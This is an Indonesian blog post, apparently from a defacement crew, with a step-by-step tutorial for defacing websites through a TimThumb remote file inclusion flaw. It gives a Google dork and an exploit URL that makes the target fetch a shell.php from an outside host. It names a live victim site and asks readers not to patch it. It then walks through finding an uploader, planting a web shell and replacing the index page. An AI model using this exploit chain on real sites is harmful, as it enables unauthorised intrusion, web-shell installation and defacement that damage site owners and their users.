Deface Timthumb Rfi
February 21, 2019
4 Comments
Kali Ini Gue Mau Kadih Tutorial Deface Dengan Proof Timthumb Remote File Inclusion Yo Langsung Aja
Dork : inurl:kinheditor
Thanks : Will
NB : [Dork On Google Images]
Exploit : /thumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
Live Target : http://timvietexme.vn (Jangan Dipatch Ajg Buat Tutor + Biar Yang Lain Juga Bisa Ngerasain)
Selanjutnya Kita Kasih Exploitnya Seperti Dibawah Ini
http://timvietexme.vn/thumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
Kalo Vuln? Akan Seperti Gambar Dibawah Ini Timthumb Version Dibawah 2.0
Kalo Seperti Yang Diatasi Itu Vuln Yah
Nah Kalo Udah Kalian Copy Bacaan Dibelakang Public_htmlnya
Lalu Akan Seperti Gambar Dibawah Ini
Nah Kalo Udah Kalian Copy Bacaan Di Belakang Public_html
Contoh : http://timvietexme.vn/cache/dedot.php
Nah Maka Akan Muncul Uploadernya Buat Up Shell
Nah Langsung Aja Upl Shenya Yah Kntl
Cara Manggil Shellnya? Tinggal Klik Bacaan Yang Birunya Guys
Nah Kalo Udah Seterah Lo Pada Mau Ngapain Aja Ajg (Kalo Mau Tebas Indexnya Jangan Lupa DiBackUp Yah)
Thanks To All Member Ghost Riddiculous Team
Mantap Jembut
ReplyDelete:v
ReplyDeleteMacam Tae :v
ReplyDeleteThis comment has been removed by the author.
ReplyDelete